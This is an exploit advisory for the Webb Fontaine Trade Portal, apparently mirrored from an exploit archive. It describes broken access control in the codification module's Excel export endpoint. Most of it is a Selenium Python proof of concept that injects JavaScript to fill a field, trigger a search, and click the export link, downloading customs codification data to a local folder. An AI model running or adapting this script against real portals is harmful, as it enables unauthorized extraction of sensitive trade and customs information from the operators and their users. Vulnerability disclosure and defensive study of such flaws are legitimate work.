Share
## https://sploitus.com/exploit?id=PACKETSTORM:217492
=============================================================================================================================================
    | # Title     : Webb Fontaine Trade Portal โ€“ Broken Access Control in Codification Export Endpoint Leads to Unauthorized Data Export        |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://webbfontaine.com/fr/                                                                                                |
    =============================================================================================================================================
    
    [+] Summary    : A security vulnerability was identified in the Webb Fontaine Trade Portal affecting the codification module (/trade/help/codification). 
                     The issue allows unauthorized users to trigger data export functionality via the /export/excel endpoint without proper validation of session state or user interaction.
                     The backend fails to enforce strict access control and does not verify whether the export request originates from a legitimate user action. 
    				 By initiating a crafted request after triggering a search operation, an attacker may retrieve sensitive codification data in Excel format.
                     Additionally, the application relies on client-side interaction logic while lacking robust server-side verification, resulting in a Broken Access Control / Session Handling flaw.
                     This vulnerability may allow unauthorized data extraction and represents a significant risk in environments handling sensitive trade and customs information.
    				 
    [+] POC   :  
    
    import os
    import time
    from selenium import webdriver
    from selenium.webdriver.chrome.service import Service
    from selenium.webdriver.chrome.options import Options
    from selenium.webdriver.common.by import By
    from webdriver_manager.chrome import ChromeDriverManager
    from selenium.webdriver.support.ui import WebDriverWait
    from selenium.webdriver.support import expected_conditions as EC
    
    BASE_DIR = r"C:\Users\sangrava\Desktop\SANGRAVA_LOGISTICS_HUB"
    os.makedirs(BASE_DIR, exist_ok=True)
    
    def run_sangrava_long_session():
        print("[*] Launching SANGRAVA Persistent Engine...")
    
        chrome_options = Options()
        chrome_options.add_experimental_option("detach", True) 
        prefs = {
            "download.default_directory": BASE_DIR,
            "download.prompt_for_download": False,
            "directory_upgrade": True,
            "safebrowsing.enabled": True
        }
        chrome_options.add_experimental_option("prefs", prefs)
    
        driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()), options=chrome_options)
        driver.maximize_window()
    
        try:
    
            url = "https://example/trade/help/codification?lang=en"
            print(f"[*] Navigating to: {url}")
            driver.get(url)
            wait = WebDriverWait(driver, 30)
    
            print("[*] Injecting session bypass values...")
            injection_script = """
                var field = document.getElementsByName('reference')[0];
                if(field) {
                    field.value = 'attachedDocument';
                    field.dispatchEvent(new Event('change'));
                    document.getElementById('search').click();
                    return true;
                }
                return false;
            """
            driver.execute_script(injection_script)
            print("[+] Search triggered. Waiting for server response...")
            time.sleep(10)
            print("[*] Attempting to grab the hidden Excel link...")
            try:
                excel_xpath = "//a[contains(@href, 'export/excel')]"
                excel_link = wait.until(EC.presence_of_element_located((By.XPATH, excel_xpath)))
                driver.execute_script("arguments[0].click();", excel_link)
                print("[SUCCESS] Download initiated.")
            except:
                print("[!] Excel link not found. It might be a session-only generation.")
            print("\n" + "="*50)
            print("[STAY ACTIVE] Browser will remain open for 60 minutes.")
            print("[ACTION] You can now interact with the browser manually.")
            print("="*50)
            time.sleep(3600) 
    
        except Exception as e:
            print(f"[CRITICAL] Error: {e}")
        finally:
            print("[*] Script execution finished. Detached session remains.")
    
    if __name__ == "__main__":
        run_sangrava_long_session()
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================